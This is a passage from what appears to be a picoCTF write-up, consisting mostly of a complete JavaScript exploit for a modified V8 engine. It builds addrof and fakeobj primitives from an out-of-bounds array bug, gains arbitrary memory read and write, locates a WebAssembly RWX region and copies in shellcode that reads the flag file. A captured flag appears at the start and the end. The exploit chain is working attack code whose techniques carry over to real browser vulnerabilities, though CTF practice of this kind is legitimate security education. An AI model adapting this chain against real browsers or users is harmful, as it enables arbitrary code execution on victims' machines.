picoCTF{sh0u1d_hAv3_d0wnl0ad3d_m0r3_rAm_3a9ef72562166255}
[*] Closed connection to mercury.picoctf.net port 60233

Full Exploit

// setup
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);

function ftoi(val) { // typeof(val) = float
    f64_buf[0] = val;
    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}

function itof(val) { // typeof(val) = BigInt
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}

// addrof and fakeobj
var float_arr = [1.5, 2.5];
float_arr.setHorsepower(50);
var float_map = float_arr[2];       // both map and properties


var initial_obj = {a:1};	// placeholder object
var obj_arr = [initial_obj];
obj_arr.setHorsepower(50);


// store upper 4 bytes of leak
let upper = ftoi(float_arr[12]) & (0xffffffffn << 32n);

function addrof(obj) {
    obj_arr[0] = obj;
    let leak = float_arr[12];
    return ftoi(leak) & 0xffffffffn;
}

function fakeobj(compressed_addr) {
    float_arr[12] = itof(upper + compressed_addr);
    return obj_arr[0];
}

/* test addrof and fakeobj
// first leak the address
let addr_initial = addrof(initial_obj);
// now try and create an object from it
let fake = fakeobj(addr_initial);
// fake should now be pointing to initial_obj
// meaning fake.a should be 1
console.log(fake.a);
*/

// array for access to arbitrary memory addresses
var arb_rw_arr = [float_map, 1.5, 2.5, 3.5];
console.log("[+] Address of Arbitrary RW Array: 0x" + addrof(arb_rw_arr).toString(16));
// %DebugPrint(arb_rw_arr);

function arb_read(compressed_addr) {
    // tag pointer
    if (compressed_addr % 2n == 0)
        compressed_addr += 1n;

    // place a fake object over the elements of the valid array
    // we know the elements array is placed just ahead in memory, so with a length
    // of 4 it's an offset of 4 * 0x8 = 0x20
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);

    // overwrite `elements` field of fake array
    // size of 2 and elements pointer
    // initially with the map and a size smi, so 0x8 offset
    arb_rw_arr[1] = itof((0x2n << 33n) + compressed_addr - 8n);

    // index 0 will returns the arbitrary read value
    return ftoi(fake[0]);
}

/* test arb_read
let float_map_lower = ftoi(float_map) & 0xffffffffn;
console.log("Map at: 0x" + float_map_lower.toString(16));
console.log("Read: 0x" + arb_read(float_map_lower).toString(16));
*/

// would normally be initial, but we hope and pray
function arb_write(compressed_addr, val) {
    // place a fake object and change elements, as before
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
    arb_rw_arr[1] = itof((0x2n << 33n) + compressed_addr - 8n);

    // Write to index 0
    fake[0] = itof(BigInt(val));
}

/* test initial_arb_write
let float_map_lower = ftoi(float_map) & 0xffffffffn;
console.log("Map at: 0x" + float_map_lower.toString(16));
initial_arb_write(float_map_lower, 0x12345678n);
*/

var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;

let rwx_pointer_loc = addrof(wasm_instance) + 0x67n;
let rwx_base = arb_read(rwx_pointer_loc);
console.log("[+] RWX Region located at 0x" + rwx_base.toString(16));

//
function copy_shellcode(addr, shellcode) {
    // create a buffer of 0x100 bytes
    let buf = new ArrayBuffer(0x100);
    let dataview = new DataView(buf);
    
    // overwrite the backing store so the 0x100 bytes can be written to where we want
    let buf_addr = addrof(buf);
    let backing_store_addr = buf_addr + 0x14n;
    arb_write(backing_store_addr, addr);

    // write the shellcode 4 bytes at a time
    for (let i = 0; i < shellcode.length; i++) {
	dataview.setUint32(4*i, shellcode[i], true);
    }
}

payload = [0x0cfe016a, 0x2fb84824, 0x2f6e6962, 0x50746163, 0x68e78948, 0x7478742e, 0x0101b848, 0x01010101, 0x48500101, 0x756062b8, 0x606d6701, 0x04314866, 0x56f63124, 0x485e0c6a, 0x6a56e601, 0x01485e10, 0x894856e6, 0x6ad231e6, 0x050f583b]
copy_shellcode(rwx_base, payload);
f();

// picoCTF{sh0u1d_hAv3_d0wnl0ad3d_m0r3_rAm_3a9ef72562166255}